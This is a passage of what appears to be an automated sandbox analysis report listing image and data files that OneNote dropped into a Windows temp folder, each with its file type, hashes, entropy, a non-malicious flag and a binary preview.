Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:15:20.............................\.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.......J...\O.,......../$..........OE.m.o......T....Z..l.g.-....m.?...Y....3......"....].j.X.k.S.k.....4..R....{....?F.

C:\Users\user\AppData\Local\Temp\{4F61B59E-9FB9-4C75-A43A-485F80124FA9}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	95763
Entropy (8bit):	7.931689087616878
Encrypted:	false
SSDEEP:	1536:EoES7mhTyzabUaE77xAOmq0zVruQlttNxlipxVWssMU2YhRy2v6pKKYhQzwMc2:zz7mhTyzabUa4b4xuQlttnlGx8x9h02M
MD5:	177DD42CA99CAA2CCBF2974221680334
SHA1:	35FD86B3DD082A6D4930C67BC0E05D3B5817465A
SHA-256:	525A857D0EDA855A64D3619DF58B1C2D013A73E60FA0D49B155ECFCB2C134C7C
SHA-512:	6FB6D9A6C97B1115C3246690A2F339CD612899AC25ACBA00296EAEAA0A1D094E7339D670969764FE23EB7C08FCDD01C6F78FBC0735D504D5E02AD342901719B3
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!..1AQa...q......."...2..B#Rb3..r$...6..C4....Ss%5...tu.c..Dd.EU7....................!.1.AQ..aq......"r..2...4Rb#3$B.Ss............?..H..dV....U..-..0]Cp.%O.Z.Y.e.=/.q.....j76.w@s...5.&&&5...n..w..>.1....;.vR..[.......=.......KtY]u3.g18...).r....&.IZ'.....g..4kY..X..b.......y<...r1........e.._...X...w....op.m%Jr31...S.Vo.._....OI\]....F..V-....\...2j..X.....y.p.$4.....&#..]..n.V..x..P...F..C.f....])..~..Z\.....,..#..v..v...2V.k.SuaydO../[.c._..oTV<Z.s.[...o.x..>....-....v...#....-.X..L.Z./#.XG.-.0......%w..H.@aZ....C.}...N~.;..R......5.D......I.... .R........s.>..ks....(...S...9....2=. :^.. p.+?(....$..Q..I.........=\|..`2. v..t......U.8.u.. ...'...*...2;u....& 3..$.

C:\Users\user\AppData\Local\Temp\{4FBB6ADE-3631-40A1-A320-5D6E74BAA289}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 39 x 600, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2104
Entropy (8bit):	7.252780160030615
Encrypted:	false
SSDEEP:	48:2PPEOtz2P/LJtVRaqBG8qFOPvHlcEXgkuwf+j:2PZFSjJDjqFOPPlXgG+j
MD5:	F6C596F505504044DF1E36BA5DA3F09B
SHA1:	BCF17EC408899B822492B47E307DE638CC792447
SHA-256:	EDBB86F160050FBF1F9860276802BAE292DBFD0BC98E3EA90D43D981E9F0C54A
SHA-512:	E8D067A1932CED8746FE7D665EEC34EA92A98AFF3DF26FFA9DD02742DDEA3C5654124A88A649FA33DB596F96A5FC9CB2C693D03132F1C8B254ACB56DB4763BD8
Malicious:	false
Preview:	.PNG........IHDR...'...X.......:....PLTE.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................{.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^..c.%i.F...m.m.f.m.m.m{&....X...9.....M.WUW.d.N.O...E$...$...)H....n....N.k..v.....v1L[w)w.}..!...Y.X.V.D.......[....;..[..;....

C:\Users\user\AppData\Local\Temp\{50A7F46A-7F71-4C9B-8B71-AD7004576661}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	25622
Entropy (8bit):	7.058784902089801
Encrypted:	false
SSDEEP:	384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
MD5:	F8CCFC24DEB1D991EBE085E1B2D7D9BF
SHA1:	AF76C22A765434AEDA134924C517C84107F4FED5
SHA-256:	7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
SHA-512:	818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.\|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..\|..n.....6....f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf......z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.).e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.\|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

C:\Users\user\AppData\Local\Temp\{58DFE259-6AC5-4EB9-B83A-8F6245665BB2}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
Category:	dropped
Size (bytes):	68633
Entropy (8bit):	7.709776384921022
Encrypted:	false
SSDEEP:	1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
MD5:	41241EE59AB7BC9EB34784E3BCE31CB4
SHA1:	98680761A51E9199CF3C89F68B5309FBEC7EE3CB
SHA-256:	035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
SHA-512:	3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

C:\Users\user\AppData\Local\Temp\{5C107BD9-ED9C-4081-A702-819F26627E27}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 39 x 579, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	515
Entropy (8bit):	6.740133870626016
Encrypted:	false
SSDEEP:	12:6v/7su2/c30mqkg9VgFHe7Ll8UmJX/N+1Zmkk8f3lbtI4:4mc38gFHe18lkk8f3lbth
MD5:	E96BE30D892A5412CF262FEE652921CA
SHA1:	8190A0BFE21D04BC6F3A406E91B87CA69C03A2DE
SHA-256:	0E31DA4DFCFF4A36C64C1CE940362D2309769F36369E4C43C317D5F2FA15658E
SHA-512:	D647F51ABBD013226A6ADD0D551D058C633F867F9AF5A9E099B85D6E291D220F7B85958B07381CD4C7C4F72356DBAFE2A86932AE398E28C56CDDF0744E92EE24
Malicious:	false
Preview:	.PNG........IHDR...'...C........b...`PLTE..................................................................................................bKGD....H....cmPPJCmp0712....H.s....9IDATx^..I..@.C..<..?mo.#C((.J}...~..B...b.I.i.\<.e.....(p.I.EO...q.x.......dRz....K..b0.:.<c.o..0.x\:...F....I&..ap....."P@....DO...q)p*..@Y.CL2)=......1.........4....._.G..^`..lDO...q...X....SL..z....K..#.L#..I6..ap.Ls.,....7&..ap.p..lI...,GO...q.....k.n1..4......3=.f.x.$..4.....o....x.$+..0.x\.,&6...............IEND.B`.

C:\Users\user\AppData\Local\Temp\{5C2B7221-BA52-4CFA-98A6-D5E4B88DCBE4}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:09:29], progressive, precision 8, 609x675, components 3
Category:	dropped
Size (bytes):	65998
Entropy (8bit):	7.671031449942883
Encrypted:	false
SSDEEP:	1536:klZtmExaFrtWgpc+Sg+DKeplHClpHfRtPMbe:VEWWl+SNDKqlH8p/vse
MD5:	B4F0A040890EE6F61EF8D9E094893C9C
SHA1:	303BCBA1D777B03BFD99CC01A48E0BB493C93E04
SHA-256:	1F81DDE3B42F23F0666D92EBF14D62893B31B39D72C07AEE070EAE28C2E6980E
SHA-512:	8F07E4D519F2FD001006BB34F7F8274B9AF9EC55367B88D41D24E5824FCE4354FD1290CE4735E43930829702ED53F41DF02C673904A7091E9354C28E029AD4EF
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:09:29.............................a.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..-O..s(...gO..@...[..+....+...H.'m........L.......@.......[k...S..O..p.'{X..3......]W..w.+.V....[.-.....2..i..i$.p.

C:\Users\user\AppData\Local\Temp\{5C67E591-BD39-4367-A85C-F9F6728CE1B6}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	136726
Entropy (8bit):	7.973487854173386
Encrypted:	false
SSDEEP:	3072:SIXmy5Tl704vW2ZKkvV8UU0ZWUF0BJwySIdgz816YzDc1+opecYPn:Sny5Tl704fZFV8UU6LGXwyS4xohpQPn
MD5:	4A2472AC2A9434E35701362D1C56EDDF
SHA1:	16FA2EA2D2808D75445896E03B67A93000EEDDD8
SHA-256:	505F731CB7707EFAB2EB06685B392DC7E59265A40B55AAE43E5DC15C0A86CBA4
SHA-512:	5E28D8FB2AC62ED270968072A30013334461F7CAE96058AF9EAA6E10912989DC47112D2133892BF61F7A516B77C6FF71BA2A000B750A9F95C787E538B09595C2
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQaq".....2B....R#..b3...r...C$...X.....Sc...9.%'.(Hs4Dgw..T..5GW.x.)......................!.1..AQa"2.q.......B..#c........b6.Rr.3s$.&..S...C4.%5............?.........(......(......(......(......(......(......(......(.G/.GE&...)..P.x..B.({i2Y;.z?G...Yfc.)H..^....#.....}3..Sc^.H..+...M.a.P.....GS.....H_.3..<....1f........1.<.\..nn-..s.s.\9Y....=.......S.0.......N..cA..Io..r.3..........ay.....K.....,.;9..Q......xO.Fa.2..>........{4k.....\|....?U....3.8..._/3....#.. t.y......yY.......e.<........#.....B.....Z.%.Y..S.ye.W4...l.......X...%.@y}>....l.yi..D..W......L..._D.Q....)...E....n.%...*..K.4#.8`..I....h..h.o..I......-...hB...3..u.(5..........n...,.@....a.t.9.....@.s.>.&...@

C:\Users\user\AppData\Local\Temp\{60C09180-61EB-4F27-9D8E-712990E42F61}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
Category:	dropped
Size (bytes):	59832
Entropy (8bit):	7.308211468398169
Encrypted:	false
SSDEEP:	1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
MD5:	DCDD543A4E0BA2C1909BA095D46FFBCB
SHA1:	B86C89537138FE07255354202D3EAD0B53B3C54D
SHA-256:	28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
SHA-512:	5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
Malicious:	false
Preview:	......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

C:\Users\user\AppData\Local\Temp\{617B05CF-3577-46EE-B0D6-AD9F7AFF1793}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6526552885041933
Encrypted:	false
SSDEEP:	6:RakXAdbYyfB3h1RRXUnfoO3/PAR2R2R2jK9JZ/hFyLyZ/llBRujlw//0lweI/OLT:RartYyf9/Ufoa/7QQ01+Wf/1S
MD5:	FA63D8C546A4632FBE31814C4A28A401
SHA1:	94AB01D607D96634AE63395E31862D8847148205
SHA-256:	91EDB5A81BB0CFB04850A219005761A13B5C3EC01EC2981FED0D870B56878F76
SHA-512:	C05DF99B4F817268F11A880E7BEAD906C7C82785A6301A8BD9236D2AC83368A5BCC52B204E72CB9ED28306E4FCB561E18DB9B81959AF66014FF1E230BE07CDE3
Malicious:	false
Preview:	./.C..vL....W"v_...V.2E.KU..w].................?.....I...............................................................................................................h............................................8. 0..H..s.R.........8..k*W.F.l..:..............................f.<.f.<.f.<.f.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{640000F6-0844-43FE-81D1-0C9025B931FD}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.7019649830252257
Encrypted:	false
SSDEEP:	6:ginaYyfh3h1/sXUnfhYpQsllKsR2R2R2jKHSwSpxDSwStrRuj8lvClax/0GDSwS6:HaYyfdEUfepQsAQQkj8j6V/x/rjb
MD5:	D04FCA48BFC3097053A37054AF61599A
SHA1:	E81B88067A5C51069F5BF7615BEA6888A670FFE5
SHA-256:	6169FD02484DB940A3EE7B36D9712DACFD49FBCA3EE8AB82D552ED97A86585CB
SHA-512:	910C7DF1228412D543D362B6C1B9DCD0DB2C7203D4BE4C41F33CEB591189B32548FE7B8F834DB4496FE9E181EDE4AD39C04089AF3017737EE4986F7820637A0B
Malicious:	false
Preview:	.R\{..M..Sx.)...."`.`.K......f,................?.....I...................................................................$m.z.\.O....#..N0.......................h............................................R.T...L..$............%.m..I......&.............................f.<.f.<.f.<.f.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{64A06361-226D-4160-B318-A2E0828C84F1}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:27:10], progressive, precision 8, 102x792, components 3
Category:	dropped
Size (bytes):	52912
Entropy (8bit):	7.679147474806877
Encrypted:	false
SSDEEP:	1536:DB/nIviNJD9C8kfJj6TkVr4q24FsUpjPc021si:DdnIvi3D9C8Cl6Dq24ayPCz
MD5:	1122BF4C2A42B4FA7F29D3C94954A7C9
SHA1:	3750077A830FE21735A43ABD35C63BA9A4D4B0DE
SHA-256:	423B0DD1A93B391D15B1DC8D8757C3BF5725FF2E7A59E6E3140033E2876B67F6
SHA-512:	4626EFE2EDED2361D6296B57F994DC434CC9D02357A8A6A67D84A544FB8A1CFE0005EA98F846AB963BED7F2B6CE96BC9181182C9459843A52A98D3A731A4FE73
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:27:10............................f.........................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....]+\.9.9.P.d..Z.?~>.-...]6=...........S.9G...b<$..Z..........>.v.o:.o%.e...z.F`...[.wo..z.....k..E...5....G..7.......c2..

C:\Users\user\AppData\Local\Temp\{654C3C0E-EE59-4BA1-A06A-2B3D26AC9AB9}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6468804309361518
Encrypted:	false
SSDEEP:	6:RaY7yjFmXlFYyfB3h1RRXUnfVHD6iR2R2R2jKbeRM6qp76qnRujlw//0lweI/Sc6:RaY7yRGlFYyf9/UfVHm5QQyGWf/S9
MD5:	7CF196CD1480E7E51D3A72100B966783
SHA1:	5C920D94E1B74BBAFFB1FAB5FD2DE0409EF2D248
SHA-256:	0BEE1AFCE8D3086FCD3049F25851FF61D1A7058D944BF666EA1580618782CBC5
SHA-512:	94C2E226BAB363C20B5D3C1F9AE416EF95BBB2294D92A68B00F863A26D6EA8BFB6459F4BE21A7FDCDC33A8523ABAF52A04D09A0D5C748E04F360F66DD7B76606
Malicious:	false
Preview:	./.C..vL....W"v_..q..#.D...FL..................?.....I...............................................................................................................h...........................................e.....C....T-................QO...=.f4F.............................f.<.f.<.f.<.f.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{66F46AEF-1949-4569-A79B-7318DDC9858B}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 60 x 336, 4-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	347
Entropy (8bit):	6.85024426015615
Encrypted:	false
SSDEEP:	6:6v/lhPtnlx/QulkWNY2V18A6Akp7eee1VDjMHCyLezyKUX5Gp:6v/7RrIubiA6AkpNhiyKe+
MD5:	78762C169F8B104CB57DFF5A1669D2DF
SHA1:	9638B71B584CD636834016A635ABF8D9C0887711
SHA-256:	E64FDCD0B108737D8B8F7B677029F924031D6BBAA50585D9C3DEF7C7E92ECAF2
SHA-512:	5ED899AAF73B72DEC32E171FFA112382667D5BF3FBA98C92E313E66C0A6975EA97068F4CD32B62283F18DBD5345C11E3610F7EEAC2F2DE71FC44593180B9CEAC
Malicious:	false
Preview:	.PNG........IHDR...<...P.............PLTE......................=l......bKGD....H....cmPPJCmp0712....Om......IDATh......@..aI...B..C..l...^.%.`....>.]..\|0.....a...hb...0......q.......p"....;...K..x=...p...y.yy~J....\|...\.......y..X.......'...>1...Ky..f....&........N`..f0..b...3.......`Z.3..3.....o.......4.&........SV...4.....IEND.B`.

C:\Users\user\AppData\Local\Temp\{69096EC4-CFB1-4C35-A014-86F4E6C3DEF4}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	25622
Entropy (8bit):	7.058784902089801
Encrypted:	false
SSDEEP:	384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
MD5:	F8CCFC24DEB1D991EBE085E1B2D7D9BF
SHA1:	AF76C22A765434AEDA134924C517C84107F4FED5
SHA-256:	7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
SHA-512:	818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.\|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..\|..n.....6....f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf......z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.).e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.\|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

C:\Users\user\AppData\Local\Temp\{696E91F9-8D4D-440D-8FD3-D2183E33CE73}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:11:38], progressive, precision 8, 577x757, components 3
Category:	dropped
Size (bytes):	84097
Entropy (8bit):	7.78862495530604
Encrypted:	false
SSDEEP:	1536:cgHTEuD99rHwA5MSadIV2MApVmfJkAKOQ/Z1I7ngpDDyHfKFVITrU:HHjXidIhApV88/jIEmrU
MD5:	37EED97290E8ECB46A576C84F0810568
SHA1:	18D9FACB4CFA3CBF63B882CABCF30B203EDF4126
SHA-256:	140DD943D0F0CFE6AAA98470B7D1A7CB62CA02CB1D8F522DD2AC77433232EF41
SHA-512:	E0F57314C136211B8253EB2AC0093DED82198E7170D4F97C40D82FD4EC4123D2AAFE3EB4EBC3E7523C4DF4D77619408773871BDE15B6DC6C4049C71D5B9D4222
Malicious:	false
Preview:	......JFIF.....H.H.....hExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:11:38.............................A.......................................................&.(.................................2.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................z.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....b.xH......T..I...S.q.~..../s.R.x.....8.a..vE.5...-.G.A.4...._......$K..d.@NC.q....J.....>e".I.%...I0).R.I$........M3.F .

C:\Users\user\AppData\Local\Temp\{6B8FC1E7-F581-42A0-9FA7-C3FA1CACCEE2}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	76485
Entropy (8bit):	7.79809544163696
Encrypted:	false
SSDEEP:	1536:xvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7s:xgS2EJbyYeMYkKkyX3DWvLLATiY
MD5:	734BA03175EBC8B8E3EF57BC3DDC9D8E
SHA1:	1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918
SHA-256:	275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
SHA-512:	23EA232051472C3F4F61D81012F989BA54B24180C1353C860BCBBD92C89D2F395BF02786902AA9E0BFF634043A5C5E73CDB743124A8B5ECFBD0D583F28BB0B9F
Malicious:	false
Preview:	.PNG........IHDR.............v......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly\|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D...A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.

C:\Users\user\AppData\Local\Temp\{6C33A57E-9BBB-409A-8678-77E66AF419D7}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 85 x 470, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	11197
Entropy (8bit):	7.975073010774664
Encrypted:	false
SSDEEP:	192:p9wNdtRKcVHso6zsqm06xaqZdingVzLZ7/PGSIz/yycRTbChh/JzhbEx15RGb:mdtMcVHqgAqTinMzLZ7/uSIz/yTR/mhF
MD5:	DDC3CC30794277500EFE4BC6667EC123
SHA1:	EFC9642C1F95B5FC38764476AE481649C016FA0C
SHA-256:	7F5B660A1A0BF46C75AAF19B4F77A0E086DE003EC03AFC1F58D871D55AA5BA9E
SHA-512:	25232A84604C3959634D33090238FEC8D51E40AD84EB3A08BB8522A81BE1E83378649C014E98E1DFCDF46B7BFAC92D8D2429211CD11D7EE0334C9C3DF7C1B6A6
Malicious:	false
Preview:	.PNG........IHDR...U.........1x5.....PLTE....................................e........................................................s...............x..........................o..............................................................................................................................................................~.............................m...............................................j...............................................p.......z......................................................x..............\|........................................v.......................y..........................................................h...........................................................................P..{....bKGD....H....cmPPJCmp0712....H.s...(SIDATx^.}i@S..N....h...!..)....AI%..p.L."a..)..`U..,h..:O.b.:.j+.Z).b..zN.s..{O...&\|..N}...${....~.....k}.[k}{.o^.D_..W:35ly..7rL....6n0.A...b

C:\Users\user\AppData\Local\Temp\{71EC87AA-2D88-4ED2-B79E-1BF52E77FD97}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	55804
Entropy (8bit):	7.433623355028275
Encrypted:	false
SSDEEP:	1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
MD5:	4126992F65FE53D3E3E78F6B27FD49DC
SHA1:	BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
SHA-256:	3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
SHA-512:	624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
